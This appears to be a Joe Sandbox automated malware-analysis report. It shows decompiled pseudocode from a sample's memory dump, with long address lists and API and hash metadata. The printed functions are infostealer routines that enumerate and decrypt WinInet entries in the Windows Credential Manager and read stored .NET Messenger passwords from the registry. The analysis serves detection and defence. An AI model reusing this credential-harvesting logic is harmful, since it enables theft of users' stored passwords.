				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045F2( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x4155a0;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x4155a8;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x4155b0;
								} else {
									L30:
									_t159 = _t165 +  *0x4155b8;
								}
								goto L41;
							}
						} else {
							E004045F2( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x415598;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L00412066();
					_v36 = _t159;
					 *_t125 =  *0x415590;
					L00412066();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                                                                                                                        0x00401a0f
                                                                                                                                                                        0x00401a0f
                                                                                                                                                                        0x00401a15
                                                                                                                                                                        0x00401a1b
                                                                                                                                                                        0x00401a20
                                                                                                                                                                        0x00401a22
                                                                                                                                                                        0x00401a24
                                                                                                                                                                        0x00401a28
                                                                                                                                                                        0x00401a2c
                                                                                                                                                                        0x00401a2d
                                                                                                                                                                        0x00401a31
                                                                                                                                                                        0x00401a35
                                                                                                                                                                        0x00401a39
                                                                                                                                                                        0x00401a3d
                                                                                                                                                                        0x00401a41
                                                                                                                                                                        0x00401a45
                                                                                                                                                                        0x00401a49
                                                                                                                                                                        0x00401a51
                                                                                                                                                                        0x00401a55
                                                                                                                                                                        0x00401a59
                                                                                                                                                                        0x00401a5d
                                                                                                                                                                        0x00401a63
                                                                                                                                                                        0x00401a63
                                                                                                                                                                        0x00401a6c
                                                                                                                                                                        0x00401a70
                                                                                                                                                                        0x00401a72
                                                                                                                                                                        0x00401a72
                                                                                                                                                                        0x00401a7c
                                                                                                                                                                        0x00401a7e
                                                                                                                                                                        0x00401a7e
                                                                                                                                                                        0x00401a88
                                                                                                                                                                        0x00401a8a
                                                                                                                                                                        0x00401a8a
                                                                                                                                                                        0x00401a94
                                                                                                                                                                        0x00401a96
                                                                                                                                                                        0x00401a96
                                                                                                                                                                        0x00401aa0
                                                                                                                                                                        0x00401aa2
                                                                                                                                                                        0x00401aa2
                                                                                                                                                                        0x00401aac
                                                                                                                                                                        0x00401aae
                                                                                                                                                                        0x00401aae
                                                                                                                                                                        0x00401ab5
                                                                                                                                                                        0x00401ac0
                                                                                                                                                                        0x00401ac3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401ab7
                                                                                                                                                                        0x00401aba
                                                                                                                                                                        0x00401ac5
                                                                                                                                                                        0x00401ac5
                                                                                                                                                                        0x00401abc
                                                                                                                                                                        0x00401abc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401abc
                                                                                                                                                                        0x00401aba
                                                                                                                                                                        0x00401acb
                                                                                                                                                                        0x00401adf
                                                                                                                                                                        0x00401ae5
                                                                                                                                                                        0x00401b07
                                                                                                                                                                        0x00401b07
                                                                                                                                                                        0x00401ae7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401ae7
                                                                                                                                                                        0x00401ae9
                                                                                                                                                                        0x00401afa
                                                                                                                                                                        0x00401af1
                                                                                                                                                                        0x00401af5
                                                                                                                                                                        0x00401af5
                                                                                                                                                                        0x00401afe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b00
                                                                                                                                                                        0x00401b05
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b05
                                                                                                                                                                        0x00401b0a
                                                                                                                                                                        0x00401b0a
                                                                                                                                                                        0x00401b0e
                                                                                                                                                                        0x00401b41
                                                                                                                                                                        0x00401b52
                                                                                                                                                                        0x00401b5a
                                                                                                                                                                        0x00401b5b
                                                                                                                                                                        0x00401b63
                                                                                                                                                                        0x00401b63
                                                                                                                                                                        0x00401b69
                                                                                                                                                                        0x00401b7a
                                                                                                                                                                        0x00401b90
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b7c
                                                                                                                                                                        0x00401b7f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b81
                                                                                                                                                                        0x00401b85
                                                                                                                                                                        0x00401b85
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b7f
                                                                                                                                                                        0x00401b6b
                                                                                                                                                                        0x00401b6f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b6f
                                                                                                                                                                        0x00401b5d
                                                                                                                                                                        0x00401b5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b5d
                                                                                                                                                                        0x00401b10
                                                                                                                                                                        0x00401b1b
                                                                                                                                                                        0x00401b22
                                                                                                                                                                        0x00401b26
                                                                                                                                                                        0x00401b27
                                                                                                                                                                        0x00401b31
                                                                                                                                                                        0x00401b29
                                                                                                                                                                        0x00401b29
                                                                                                                                                                        0x00401b29
                                                                                                                                                                        0x00401b29
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401b27
                                                                                                                                                                        0x00401acd
                                                                                                                                                                        0x00401ad5
                                                                                                                                                                        0x00401b92
                                                                                                                                                                        0x00401b96
                                                                                                                                                                        0x00401b9c
                                                                                                                                                                        0x00401b9c
                                                                                                                                                                        0x00401b9c
                                                                                                                                                                        0x00401ba0
                                                                                                                                                                        0x00401ba1
                                                                                                                                                                        0x00401a63
                                                                                                                                                                        0x00401bb1
                                                                                                                                                                        0x00401bb5
                                                                                                                                                                        0x00401bb6
                                                                                                                                                                        0x00401bb8
                                                                                                                                                                        0x00401bb8
                                                                                                                                                                        0x00401bc0
                                                                                                                                                                        0x00401bc2
                                                                                                                                                                        0x00401bc2
                                                                                                                                                                        0x00401bca
                                                                                                                                                                        0x00401bcc
                                                                                                                                                                        0x00401bcc
                                                                                                                                                                        0x00401bd5
                                                                                                                                                                        0x00401bd7
                                                                                                                                                                        0x00401bd7
                                                                                                                                                                        0x00401be0
                                                                                                                                                                        0x00401be2
                                                                                                                                                                        0x00401be2
                                                                                                                                                                        0x00401beb
                                                                                                                                                                        0x00401bed
                                                                                                                                                                        0x00401bed
                                                                                                                                                                        0x00401bf6
                                                                                                                                                                        0x00401c42
                                                                                                                                                                        0x00401c48
                                                                                                                                                                        0x00401c4d
                                                                                                                                                                        0x00401c4e
                                                                                                                                                                        0x00401bf8
                                                                                                                                                                        0x00401bf8
                                                                                                                                                                        0x00401bfc
                                                                                                                                                                        0x00401bfd
                                                                                                                                                                        0x00401bfe
                                                                                                                                                                        0x00401c01
                                                                                                                                                                        0x00401c06
                                                                                                                                                                        0x00401c10
                                                                                                                                                                        0x00401c13
                                                                                                                                                                        0x00401c1c
                                                                                                                                                                        0x00401c26
                                                                                                                                                                        0x00401c2a
                                                                                                                                                                        0x00401c2e
                                                                                                                                                                        0x00401c34
                                                                                                                                                                        0x00401c39
                                                                                                                                                                        0x00401c3a
                                                                                                                                                                        0x00401c3a
                                                                                                                                                                        0x00401c55

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 667451143-3916222277
                                                                                                                                                                        • Opcode ID: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                        • Instruction ID: 0a6132ce2dc9cc3df9a7f1a3dcc42749ccde8b25e91b24a7214be5fd0ed86434
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                        • Instruction Fuzzy Hash: A7619A30409781DFDB209F25848006BBBF1FB89315F909D7FF5D5A22A1E739A846CB0A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004077C5 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E004077C5(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404651( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x418968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x418968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046E1( &_v532);
									if(E004047AA( &_v532, _t152) != 0 && E0040481B(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4135f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047FB( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046CC( &_v1108);
			}















































                                                                                                                                                                        0x004077cb
                                                                                                                                                                        0x004077d5
                                                                                                                                                                        0x004077da
                                                                                                                                                                        0x004077de
                                                                                                                                                                        0x004077e9
                                                                                                                                                                        0x004077f3
                                                                                                                                                                        0x004077f7
                                                                                                                                                                        0x004077fb
                                                                                                                                                                        0x00407812
                                                                                                                                                                        0x00407812
                                                                                                                                                                        0x004077fd
                                                                                                                                                                        0x00407809
                                                                                                                                                                        0x00407809
                                                                                                                                                                        0x00407816
                                                                                                                                                                        0x0040781e
                                                                                                                                                                        0x0040782d
                                                                                                                                                                        0x0040782d
                                                                                                                                                                        0x00407839
                                                                                                                                                                        0x0040783d
                                                                                                                                                                        0x00407845
                                                                                                                                                                        0x00407849
                                                                                                                                                                        0x0040784f
                                                                                                                                                                        0x00407861
                                                                                                                                                                        0x00407873
                                                                                                                                                                        0x00407878
                                                                                                                                                                        0x0040787d
                                                                                                                                                                        0x00407883
                                                                                                                                                                        0x00407883
                                                                                                                                                                        0x0040788e
                                                                                                                                                                        0x00407896
                                                                                                                                                                        0x00407897
                                                                                                                                                                        0x00407897
                                                                                                                                                                        0x0040789f
                                                                                                                                                                        0x004078a6
                                                                                                                                                                        0x004078ad
                                                                                                                                                                        0x004078b5
                                                                                                                                                                        0x004078bd
                                                                                                                                                                        0x004078c1
                                                                                                                                                                        0x004078cd
                                                                                                                                                                        0x004078ff
                                                                                                                                                                        0x00407907
                                                                                                                                                                        0x0040790c
                                                                                                                                                                        0x00407915
                                                                                                                                                                        0x0040791a
                                                                                                                                                                        0x0040791c
                                                                                                                                                                        0x0040791c
                                                                                                                                                                        0x0040792b
                                                                                                                                                                        0x00407933
                                                                                                                                                                        0x0040793a
                                                                                                                                                                        0x00407941
                                                                                                                                                                        0x00407948
                                                                                                                                                                        0x0040794f
                                                                                                                                                                        0x00407956
                                                                                                                                                                        0x0040795d
                                                                                                                                                                        0x00407961
                                                                                                                                                                        0x0040796b
                                                                                                                                                                        0x00407973
                                                                                                                                                                        0x00407977
                                                                                                                                                                        0x0040797f
                                                                                                                                                                        0x00407984
                                                                                                                                                                        0x00407989
                                                                                                                                                                        0x0040798b
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x00407991
                                                                                                                                                                        0x004079a5
                                                                                                                                                                        0x004079a9
                                                                                                                                                                        0x004079a9
                                                                                                                                                                        0x004079b6
                                                                                                                                                                        0x004079b6
                                                                                                                                                                        0x004079bb
                                                                                                                                                                        0x004079c7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004079c7
                                                                                                                                                                        0x0040784f
                                                                                                                                                                        0x004079cd
                                                                                                                                                                        0x004079d1
                                                                                                                                                                        0x004079d1
                                                                                                                                                                        0x00407816
                                                                                                                                                                        0x004079e4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040782F
                                                                                                                                                                        • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                                                                                                                                                                        • memset.MSVCRT ref: 00407907
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040792B
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040797F
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                                                                                                                                                                          • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                        • String ID: J$Microsoft_WinInet
                                                                                                                                                                        • API String ID: 2413121283-260894208
                                                                                                                                                                        • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                        • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040DB04 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040DB04(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E0040132A( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046E1( &_v556);
				if(E004047AA(_t69, _t74) == 0) {
					L8:
					E004047FB( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E0040481B(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                                                                                                                        0x0040db04
                                                                                                                                                                        0x0040db1d
                                                                                                                                                                        0x0040db2d
                                                                                                                                                                        0x0040db30
                                                                                                                                                                        0x0040db33
                                                                                                                                                                        0x0040db3b
                                                                                                                                                                        0x0040dc25
                                                                                                                                                                        0x0040dc2a
                                                                                                                                                                        0x0040dc36
                                                                                                                                                                        0x0040dc36
                                                                                                                                                                        0x0040db41
                                                                                                                                                                        0x0040db45
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040db4b
                                                                                                                                                                        0x0040db52
                                                                                                                                                                        0x0040db55
                                                                                                                                                                        0x0040dbcb
                                                                                                                                                                        0x0040dbce
                                                                                                                                                                        0x0040dbd1
                                                                                                                                                                        0x0040dbe5
                                                                                                                                                                        0x0040dbec
                                                                                                                                                                        0x0040dc05
                                                                                                                                                                        0x0040dc08
                                                                                                                                                                        0x0040dc10
                                                                                                                                                                        0x0040dc12
                                                                                                                                                                        0x0040dc18
                                                                                                                                                                        0x0040dc1e
                                                                                                                                                                        0x0040dc1e
                                                                                                                                                                        0x0040dc10
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040dbd1
                                                                                                                                                                        0x0040db57
                                                                                                                                                                        0x0040db5d
                                                                                                                                                                        0x0040db69
                                                                                                                                                                        0x0040dbbc
                                                                                                                                                                        0x0040dbc2
                                                                                                                                                                        0x0040dbc7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040dbc7
                                                                                                                                                                        0x0040db71
                                                                                                                                                                        0x0040db7a
                                                                                                                                                                        0x0040db90
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040db95
                                                                                                                                                                        0x0040dba4
                                                                                                                                                                        0x0040dbac
                                                                                                                                                                        0x0040dbac
                                                                                                                                                                        0x0040dbb6
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040DB33
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                          • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                          • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040DBA4
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040DC2A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                                                                                        • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                                                                                        • API String ID: 3289975857-105384665
                                                                                                                                                                        • Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                        • Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
                                                                                                                                                                        • Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                        • Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405E50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E00405E50(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                                        0x00405e50
                                                                                                                                                                        0x00405e56
                                                                                                                                                                        0x00405e5e
                                                                                                                                                                        0x00405e66
                                                                                                                                                                        0x00405e6b
                                                                                                                                                                        0x00405e75
                                                                                                                                                                        0x00405e7d
                                                                                                                                                                        0x00405e7f
                                                                                                                                                                        0x00405e7f
                                                                                                                                                                        0x00405e7d
                                                                                                                                                                        0x00405e9b
                                                                                                                                                                        0x00405eca
                                                                                                                                                                        0x00405e9d
                                                                                                                                                                        0x00405ea8
                                                                                                                                                                        0x00405eb0
                                                                                                                                                                        0x00405eb6
                                                                                                                                                                        0x00405eba
                                                                                                                                                                        0x00405eba
                                                                                                                                                                        0x00405ed4

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                                                                                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                                                                                                                                                                        • strlen.MSVCRT ref: 00405EA0
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                                                                                                                                                                        • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
